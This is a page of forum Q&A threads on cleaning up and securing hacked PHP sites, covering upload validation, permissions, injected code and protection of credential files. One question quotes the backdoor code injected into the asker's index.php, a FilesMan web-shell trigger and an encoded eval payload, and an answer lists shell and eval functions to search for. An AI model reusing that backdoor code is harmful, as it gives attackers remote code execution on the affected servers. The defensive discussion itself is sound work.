php security issue - file uploads - php

On of my client approached me to check and fix the hacked site. Site was developed by another developer , Very inexperienced developer not even basic security taken care of.
Well the problem was somehow PHP files were written to the images folder. Hackers also wrote an index.html which displays site is hacked. When I check images folder has 777 permissions. So I came to rough conclusion that its because of folder permissions. Hosting support guy says that some PHP file has poorly written scripts which allowed any extension file to upload to server, and then hackers executed files to gain access or do whatever they want.
I have few questions:
Is it only through upload functionality can we upload other PHP files ?
Is it not possible other way to write files from remote as folder permissions are 777?
Sit has some fckeditors editors and couple of upload functionalities. I checked them, there are enough validations , so when extensions other then images or PDF are tried to upload they just return false .
Does'nt setting folder permissions to lower level fix the issue?
I asked the support guy to change folder permissions and it would solve the issue, but he says there is some PHP file through of which other PHP files were written and he wants that to be fixed otherwise site cannot go live. He says even folder permissions are changed hacker can again change them to 777 and execute whatever he wants because that poorly written PHP file.
How should be my approach to find if there is such PHP file? Any help or pointers would be much appreciated.

777 means that any user on the system (with execute access for all the parent directories, anyway) can add anything to that directory. Web users are not system users, though, and most web servers (Apache included) won't let random clients write files there right out of the box. You'd have to specifically tell the server to allow that, and i'm fairly certain that's not what happened.
If you're allowing any file uploads, though, the upload folder needs to at least be writable by the web server's user (or the site's, if you're using something like suPHP). And if the web server can write to that directory, then any PHP code can write to that directory. You can't set permissions high enough to allow uploads and low enough to keep PHP code from running, short of making the directory write-only (which makes it pretty useless for fckeditor and such).
The compromise almost certainly happened because of a vulnerability in the site itself. Chances are, either there's a file upload script that's not properly checking where it's writing to, or a script that blindly accepts a name of something to include. Since the PHP code typically runs as the web server's user, it has write access to everything the web server has write access to. (It's also possible that someone got in via FTP, in which case you'd better change your passwords. But the chances of the web server being at fault are slim at best.)
As for what to do at this point, the best option is to wipe the site and restore from backup -- as has been mentioned a couple of times, once an attacker has gotten arbitrary code to run on your server, there's not a whole lot you can trust anymore. If you can't do that, at least find any files with recent modification times and delete them. (Exploits hardly ever go through that much trouble to cover their tracks.)
Either way, then set the permissions on any non-upload, non-temp, non-session directories -- and all the existing scripts -- to disallow writes, period...particularly by the web server. If the site's code runs as the same user that owns the files, you'll want to use 555 for directories and 444 for files; otherwise, you can probably get by with 755/644. (A web server would only be able to write those if it's horribly misconfigured, and a hosting company that incompetent would be out of business very quickly.)
Frankly, though, the "support guy" has the right idea -- i certainly wouldn't let a site go live on my servers knowing that it's going to be executing arbitrary code from strangers. (Even if it can't write anything to the local filesystem, it can still be used to launch an attack on other servers.) The best option for now is to remove all ability to upload files for now. It's obvious that someone has no idea how to handle file uploads securely, and now that someone out there knows you're vulnerable, chances are you'd keep getting hacked anyway til you find the hole and plug it.
As for what to look for...unfortunately, it's semi vague, as we're talking about concepts above the single-statement level. Look for any PHP scripts that either include, require, or write to file names derived in any way from $_GET, $_POST, or $_COOKIE.

Changing folder permissions won’t solve the issue unless you’re using CGI, since PHP probably needs to be able to write to an upload folder, and your web server probably needs to be able to read from it. Check the extension of any uploaded files!
(So no, 0777 permissions don’t mean that anyone can upload anything.)

As cryptic mentioned, once a hacker can run code on your server then you have to assume that all files are potentially dangerous. You should not try to fix this yourself - restoring from a backup (either from the client or the original developer) is the only safe way around this.
Once you have the backup files ready, delete everything on your your site and upload the backup - if it is a shared host you should contact them as well in case other files are compromised [rarely happens though].

You've identified 2 issues: the permissions and the lack of extension checking however have you any evidence that these were the means by which the system was compromised? You've not provided anything to support this assertion.
Changing the permissions to something more restrictive would have provided NO PROTECTION against users uploading malicious PHP scripts.
Checking the extensions of files might have a made it a bit more difficult to inject PHP code into the site, it WOULD NOT PREVENT IT.
Restoring from backup might remove the vandalized content but WILL NOT FIX THE VULNERABILITIES in the code.
You don't have the skills your client (whom is probably paying you for this) needs to resolve this. And acquiring those skills is a much longer journey than reading a few answers here (although admittedly it's a start).

Is it only through upload functionality can we upload other PHP files ? Is it not possible other way to write files from remote as folder permissions are 777?
There definitely are multiple possible ways to write a file in the web server’s document root directory. Just think of HTTP’s PUT method, WebDAV, or even FTP that may be accessible anonymously.
Sit has some fckeditors editors and couple of upload functionalities. I checked them, there are enough validations , so when extensions other then images or PDF are tried to upload they just return false .
There are many things one can do wrong when validating an uploaded file. Trusting the reliability of information the client sent is one of the biggest mistakes one can do. This means, it doesn’t suffice to check whether the client says the uploaded file is an image (e.g. one of image/…). Such information can be easily forged. And even proper image files can contain PHP code that is being executed when interpreted by PHP, whether it’s in an optional section like a comment section or in the image data itself.
Does'nt setting folder permissions to lower level fix the issue?
No, probably not. The upload directory must be writable by PHP’s and readable by the web server’s process. Since both are probably the same and executing a PHP file requires only reading permissions, any uploaded .php file is probably also executable. The only solution is to make sure that the stored files don’t have any extension that denote files that are executed by the web server, i.e. make sure a PNG is actually stored as .png.

Related

Codeigniter application getting hacked, code injected in index.php

I have a codeigniter 2.0.2 project that keeps getting hacked. There are two main issues:
Malicious code is being added to the start of the index.php file
Rogue files are added to the server
According to the host there are no FTP logs to indicate these files were uploaded.
As there are no FTP upload logs related to the rogue files - does this mean it must be an exploit via the site itself e.g. a contact or upload form?
The site is on shared hosting - code it be a site on the same server is also getting hacked and this is causing the problems?
Would it help if I change the filename of index.php to something else?
As the index.php is getting modified should I CHMOD it to 644?
I've been looking for what the suggested permissions are for codeigniter projects but not sourced any yet. I was thinking 644 across the site apart from the upload/logs directory (777) - does this sound okay?
Code injected to the top of the index.php file:
<?php if(isset($_GET["t6371n"])){ $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-
which is then followed by a long preg_replace statement with a long encoded string. This is followed by a second statement:
if(isset($_GET["w6914t"])){$d=substr(8,1);foreach(array(36,112,61,64,36,95,80,79,83,84,91,39,112,49,39,93,59,36,109,61,115,112,114,105,110,116,102,40,34,37,99,34,44,57,50,41,59,105,102,40,115,116,114,112,111,115,40,36,112,44,34,36,109,36,109,34,41,41,123,36,112,61,115,116,114,105,112,115,108,97,115,104,101,115,40,36,112,41,59,125,111,98,95,115,116,97,114,116,40,41,59,101,118,97,108,40,36,112,41,59,36,116,101,109,112,61,34,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,115,116,121,108,101,46,100,105,115,112,108,97,121,61,39,39,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,66,121,73,100,40,39,80,104,112,79,117,116,112,117,116,39,41,46,105,110,110,101,114,72,84,77,76,61,39,34,46,97,100,100,99,115,108,97,115,104,101,115,40,104,116,109,108,115,112,101,99,105,97,108,99,104,97,114,115,40,111,98,95,103,101,116,95,99,108,101,97,110,40,41,41,44,34,92,110,92,114,92,116,92,92,39,92,48,34,41,46,34,39,59,92,110,34,59,101,99,104,111,40,115,116,114,108,101,110,40,36,116,101,109,112,41,46,34,92,110,34,46,36,116,101,109,112,41,59,101,120,105,116,59)as$c){$d.=sprintf((substr(urlencode(print_r(array(),1)),5,1).c),$c);}eval($d);}
There is a contact form and a form where a user can upload items using CKFinder 2.0.1. Going to update this and see if that resolves it.
There's a couple of things you can do:
Check your logfiles for POST requests to files with weird or unfamiliar names, e.g. .cache_123.php - these could be backdoor scripts, especially filenames starting with a dot, thus hiding it from the (regular) filesystem.
Download the complete live site and do a site-wide search for things such as base64_decode, exec, preg_replace, passthru, system, shell_exec, eval, FilesMan
Have your entire (downloaded live) site checked by running it through anti-virus software (AVG, Avast, ...)
Chmod upload directories 775 instead of 777 if possible
I know this is an old thread, but I'd like to add an option to figure out what and where the problem is occurring.
Create a hook which loads each time (doesn't matter at which stage) and dump the $this->input->post() and ->get() to a log file together with the classname and method name.
This way you will see quick enough where the problem started.
I think is far easier to hack through a PHP app rather than an FTP server. Do you have any upload forms ? If you can't go with a VPS, try asking your host to move it to another shared server.
I think you really need to perform a code audit to find where the core vulnerability lies. Unless you run some sort of integrity checks you can't be sure if attacker has put backdoor in other files.
As a quick fix, I would suggest you to install ModSecurity Apache module if possible. Next, look for places in code where file injection could occur (usually file upload functions).

Securing Uploaded Files (php and html)

I have a simple site which allows users to upload files (among other things obviously). I am teaching myself php/html as I go along.
Currently the site has the following traits:
--When users register a folder is created in their name.
--All files the user uploads are placed in that folder (with a time stamp added to the name to avoid any issues with duplicates).
--When a file is uploaded information about it is stored in an SQL database.
simple stuff.
So, now my question is what steps do I need to take to:
Prevent google from archiving the uploaded files.
Prevent users from accessing the uploaded files unless they are logged in.
Prevent users from uploading malicious files.
Notes:
I would assume that B, would automatically achieve A. I can restrict users to only uploading files with .doc and .docx extensions. Would this be enough to save against C? I would assume not.
There is a number of things you want to do, and your question is quite broad.
For the Google indexing, you can work with the /robots.txt. You did not specify if you also want to apply ACL (Access Control List) to the files, so that might or might not be enough. Serving the files through a script might work, but you have to be very careful not to use include, require or similar things that might be tricked into executing code. You instead want to open the file, read it and serve it through File operations primitives.
Read about "path traversal". You want to avoid that, both in upload and in download (if you serve the file somehow).
The definition of "malicious files" is quite broad. Malicious for who? You could run an antivirus on the uplaod, for instance, if you are worried about your side being used to distribute malwares (you should). If you want to make sure that people can't harm the server, you have at the very least make sure they can only upload a bunch of filetypes. Checking extensions and mimetype is a beginning, but don't trust that (you can embed code in png and it's valid if it's included via include()).
Then there is the problem of XSS, if users can upload HTML contents or stuff that gets interpreted as such. Make sure to serve a content-disposition header and a non-html content type.
That's a start, but as you said there is much more.
Your biggest threat is going to be if a person manages to upload a file with a .php extension (or some other extension that results in server side scripting/processing). Any code in the file runs on your server with whatever permissions the web server has (varies by configuration).
If the end result of the uploads is just that you want to be able to serve the files as downloads (rather than let someone view them directly in the browser), you'd be well off to store the downloads in a non web-accessible directory, and serve the files via a script that forces a download and doesn't attempt to execute anything regardless of the extension (see http://php.net/header).
This also makes it much easier to facilitate only allowing downloads if a person is logged in, whereas before, you would need some .htaccess magic to achieve this.
You should not upload to webserver-serving directories if you do not want the files to be available.
I suggest you use X-Sendfile, which is a header that instructs the server to send a file to the user. Your PHP script called 'fetch so-and-so file' would do whatever authentication you have in place (I assume you have something already) and then return the header. So long as the web server can access the file, it will then serve the file.
See this question: Using X-Sendfile with Apache/PHP

Is it a security risk to have your database details in a php file accessable via the browser?

I've just had an argument with a colleaque.
My index.php contains my mysql connection and therefor also the host, username, password and database name.
He claims it is a security thread for the possibility exists that the php parser may fail which would cause the webserver to return the entire file as plain text.
I however believe that IF the php parser would fail the webserver would give an internal server error to the users.
Can anyone confirm whether it is or is not a security risk?
thank you.
The short answer is no.
The long answer is yes, but only if:
your server's been compromised, in which case people reading your php files are the least of your worries
you've misconfigured your server to parse .php files and plain text, which would be very silly indeed.
Also, if you're using some kind of version control software, make sure your .hg or .svn or whatever folders can't be viewed from a web browser. You'd be surprised how often that happens.
EDIT:
I would be inclined to go with some of the suggestions on here already, which is what I do in my day to day development. Have a config.php file outside of your web root folder and include this in your index.php. That way you know for sure it's never going to be viewable. Btw, I've been developing in PHP for a number of years and have never had the parser fail in such a way that it's resulted in raw PHP being displayed to an end user.
EDIT 2:
If your colleague is referring to parse errors when he talks about the PHP parser "failing" then in a live environment you should have error reporting disabled anyway.
Either outcome is a possibility. The normal course of action is to use require to bring in a separate file containing your db credentials. That file should be outside the webserver file tree so it can't be reached via a browser.
I'm in the belief that you can never be too safe. What's easier, replacing thousands, possibly millions of records if a hacker gets your db information, the security breach you would have to explain to your users (and possibly their lawyers depending on content and breach) or putting your db information in a separate, password protected folder and including the information on the pages you need the connection?
To me, the choice is simple.
Your co-worker is correct but this is very unlikely to happen. The .php file will only be returned as plain text or as a download if PHP has stopped running on the host.
To be safer, use an include() path to the database credentials in a new folder. In that folder have a .htaccess file with 'deny from all'.
That way even if PHP stops running on the server, Apache will still run and protect all the files including the database credentials. If even apache stops running, the whole webserver will be unreachable and your credentials will still be safe.
:)
Personally I'd put the options in a config file outside the web tree and, once uploaded, remove FTP access from that directory. It's not just a matter of whether the PHP parser fails and drops the file out as plain text BUT if the FTP server has a vulnerability that's compromised that file could be accessed by FTP as well as HTTP.
As long as Apache/PHP is running as a separate user to FTP you can still require the config file from PHP.

All PHP files getting hacked

Like always, just want to say thank you for all of the help and input in advance.
I have a particular site that I am the web developer for and am running into a unique problem. It seems that somehow something is getting into every single PHP file on my site and adding some malware code. I have deleted the code from every page multiple times and changed FTP and DB passwords, but to no avail.
The code that is added looks like this - eval(base64_decode(string)) - which the string is 3024 characters.
Not sure if anyone else has ran into this problem or if any one has ideas on how I can secure my php code up.
Thanks again.
The server itself could be compromised. Report the problem to your web host. What is their response?
An insecure PHP script coupled with incorrect file permissions could give the attacker the ability to modify your PHP files. To eliminate this possibility I would take the site down, delete all the files, re-upload, then switch permissions on the entire site to deny any writes to the file system.
Edit:
As a short-term fix try asking your web host to disable eval() for your account. If they're worth their salt they should be running Suhosin which has an option to disable eval.
You should use "disable_functions=eval,exec" in your php.ini or .htaccess as first measure.
yes i have ran into this problem myself, i take it you are on a shared host? are you perchance on rackspacecloud?
this is where i had that problem, the first thing you need to do right away is notify your host, this is a hosting issue, and i suspect the malware has gained access to your server on an ftp level.
make sure you have nothing chmod 777 world writable, if it needs to be writable by your app make it 775
hope this helps, good luck
You should change the file permissions so that only you can write to those files. 0777 (the default on some hosts, I believe) is just asking for trouble. See File Permissions.
Also, it's advisable to not put any files that aren't supposed to be accessible by URL outside of the public_html folder, for example, config files.
I had a similar problem. However, my problem was that I was running a python code evaluator on my site. As far as I remember you need to use eval() function to execute the python code. In one of my php files I had a weird eval statement. What kind of script are you developing? I mean does it involve evaluation of some other code?
You should also note that (assuming you are using a hosting solution to host your site) that it's almost never your fault. An example being that networksolutions hosting company recently had a server hacked and over 1K webpages were affected, not due to security holes on each particular site, but due to some bad configuration/monitering of what was put on that particular server that hosts those sites. If you can't see any thing security wise wrong with your code, aka you sanitize everything properly and or you are running a non vulnerable version of whatever CMS you are using (if your using a CMS) then it's probably not an issue with your site, just the server in general.
You should move to another server. It would appear that the attacker has access to the server or is running some code as a background process which is overwriting the files. It may be possible to identify and remove the problem, but smart attackers will hide additional scripts etc to trip you up later.
I've come across viruses that read filezilla conf files.
I SWEAR TO GOD. at first i was: WOW, then i was: mother f*** sneaky b*stards.
Check your pc for viruses.
One of the possible scenarios is that somebody managed to get write access somehow and changing passwords etc. helped, but he left a php file that can still run.
See if there are any unknown files there. Or delete every damn thing and restore some backups.
Get the last modified time of your files, then go over to your access logs (FTP, HTTP whatever's open, if you don't know where they are ask your host) and find out who was mucking around on your system at that time.
Likely the attacker has installed a script that they can call periodically to re-infect any files you fix.

deny access to certain folder using php

Is it possible to "deny from all" apache htaccess style using php.
I can't use htaccess because im using different webserver, so i wan't to use php to workaround it.
So let say user are trying to access folder name 'david', all content and subdirectory are denied from viewing.
No
PHP cannot be used to protect folders.
Because it is not PHP who serves requests, but a web server
You can move this catalog above Document Root to prevent web access to it.
But premissions will help you nothing
Use chmod to change the permissions on that directory. Note that the user running PHP needs to own it in that case.
If you just want to prevent indexing the folder, you can create an index.php file that does a simple redirection. Note: Requests that have a valid filename will still be let through.
<?php
header("Location: /"); // redirect user to root directory
Without cooperation from the webserver the only way to protect your files is
to encrypt them, in an archive, maybe, of which your script would know the password and tell no one - that will end up wasting cpu as the server will be decrypting it all the time, or
to use an incredibly deranged file naming scheme, a file naming scheme you won't ever describe to anyone, and that only your php script can sort trough.
Still data could be downloaded, bandwidth go to waste and encrypted files decrypted.
It all depends on how much that data matters. And how much your time costs, as these convoluted layers of somewhat penetrable obfuscation will likely eat huge chunks of developer time.
Now, as I said... that would be without cooperation from the webserver... but what if the webserver is cooperating and doesn't know?
I've seen some apache webservers, (can anyone confirm it's in the standard distribution?) for instance, come preloaded with a rule denying access to files starting with .ht, not only .htaccess but everything similar: .htproxy, .htcache, .htwhatever_comes_to_mind, .htyourmama...
Chances are your server could be one of those.
If that's the case... rename your hidden files .hthidden-<filename1>,.hthidden-<filename2>... and you'll get access to them only through php file functions, like readfile()

Categories